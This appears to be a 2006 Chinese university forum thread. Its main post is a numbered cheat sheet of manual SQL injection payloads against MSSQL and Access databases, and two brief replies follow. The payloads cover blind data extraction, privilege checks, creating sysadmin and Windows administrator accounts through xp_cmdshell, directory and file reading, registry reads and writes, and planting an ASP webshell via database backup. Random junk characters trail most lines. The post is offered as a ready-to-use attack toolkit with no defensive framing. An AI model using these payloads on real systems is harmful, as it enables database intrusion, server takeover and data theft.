社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3749阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 _UI*W&*  
  2.初步判断是否是mssql ;and user>0 Xt} 4B#  
H{hd1  
  3.注入参数是字符'and [查询条件] and ''=' $lVR6|n  
W T~UEK'  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' ,a 2(h  
g\%;b3"#  
  5.判断数据库系统 Sqn|  
/<C}v~r  
  ;and (select count(*) from sysobjects)>0 mssql ut j7"{'k|  
sE:~+C6o:  
  ;and (select count(*) from msysobjects)>0 access &rs   
{G.W?  
Jui:Ms  
QiKci%=SX  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 J'}G~rB<<  
~?#>QN\\c  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 SbLm  
n#$sLXVy  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 5ir Ffr  
OEi u,Y|@l  
  9.(1)猜字段的ascii值(access) >f$N G  
zbY2gq@?  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 7XzhKA6  
2i0 .x  
  (2)猜字段的ascii值(mssql) 3']a1\sy^  
<$z6:4uN_  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 @I"&k!e<2  
0{Uc/  
  10.测试权限结构(mssql) Eqizx~eqq  
 m#K)%0  
}Wlm#t  
pmwVVUEQ  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- = -bGH   
5}C.^J`  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- qTZ\;[CrP"  
_+7+90u  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Ah 2*7@U  
/aTW X  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- {{6D4M|s  
[g<Y,0,J  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- [x%[N)U3  
=y^`yv 3  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- /O[<"Wcz  
\+M6R<Qw  
  ;and 1=(select IS_MEMBER('db_owner'));-- o|kiwr}Y  
yE&WGpT  
-.@dA'j[  
B%7Az!GX  
  11.添加mssql和系统的帐户 / f5q9sp8  
"_^vQ1M]Z  
  ;exec master.dbo.sp_addlogin username;-- _^/k  
  ;exec master.dbo.sp_password null,username,password;-- 9\'JtZO  
`' .;U=mF  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- %<)!]8}P*  
4bs<j  
  ;exec master.dbo.xp_cmdshell 'net user username password \E(^<Af  
_lG|t6y  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- gU&y5s~  
LwlO)|E  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- )-\C{>  
]-j.\+(*  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- oBO4a^D  
57wHo[CJ  
'aWqj+Wbh  
$fCKK&Wy  
  12.(1)遍历目录 LD*XNcE  
WKAG)4  
  ;create table dirs(paths varchar(100), id int) T>hrKn.!D:  
aPdEEqc\l  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' gc\/A\F<  
<78*-Ob  
  ;and (select top 1 paths from dirs)>0 5jq @ nq6  
u\{MQB{T  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Wsb>3J  
25PZ&^G 8%  
v,'k 2H  
;kI)j ?  
  (2)遍历目录 Z;O!KsJ  
t[r 6jo7  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- pwH*&YU  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 J!Q #xs  
9a2[_Wy  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 z]2MR2W@X  
Oq^t[X'  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 })+iAxR  
}a !ny  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 0tz? sN  
/a*8z,x  
.p =OAh<  
q`'m:{8  
  13.mssql中的存储过程 cQkj{u  
6gabnW3  
  xp_regenumvalues 注册表根键, 子键 v2IcDz`}7  
CcTdLq  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (mr*Thy`@  
+zwS[P@  
  xp_regread 根键,子键,键值名 :_,a%hb+8  
6B|OKwL  
  ;exec xp_regread !gJTKQX4  
97[wz C,  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值  Q'ZZQ  
znB+RiV8  
  xp_regwrite 根键,子键, 值名, 值类型, 值 !1ZItJ74#  
^7uXpqQBr  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Jk v!]C  
:>}7^1I  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 @SH[<c  
3@nIoN'z  
  xp_regdeletevalue 根键,子键,值名 Q<NQ9lX  
]4ck)zlv   
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 cTW$;Fpc+  
lVuBo&  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Vm?#~}T  
1`1jSx5}.  
{Q>4zepN!  
>k ==7#P  
  14.mssql的backup创建webshell cTz@ga;!mI  
Zor!hc0<  
  use model =), O;M  
P*jiz@6  
  create table cmd(str image); YZ]}l%e  
g&S> Wq%L  
  insert into cmd(str) values (''); LGw-cX #  
_Ss}dU9  
  backup database model to disk='c:\l.asp'; 3ZC@q #R A  
ALn_ifNh  
WJxcJE  
fWC(L s  
  15.mssql内置函数 +PnuWK$  
7Vk9{x$z  
  ;and (select @@version)>0 获得Windows的版本号 E,F^!4 rJ$  
Rp;"]Q&b  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa "@5qjLz]  
_k : BY  
  ;and (select user_name())>0 爆当前系统的连接用户 '4 It>50b  
w_V A:]j4  
  ;and (select db_name())>0 得到当前连接的数据库 f[vm]1#  
TQ:h[6v  
E=8GSl/Jx  
%y\5L#T!>  
  16.简洁的webshell [MQ* =*  
kOdA8X RY  
  use model "uP*pR^  
-[J4nN&N  
  create table cmd(str image); >Tjl?CS  
mZXtHFMu  
  insert into cmd(str) values (''); </Y(4Xwf=  
}t"K(oamm  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八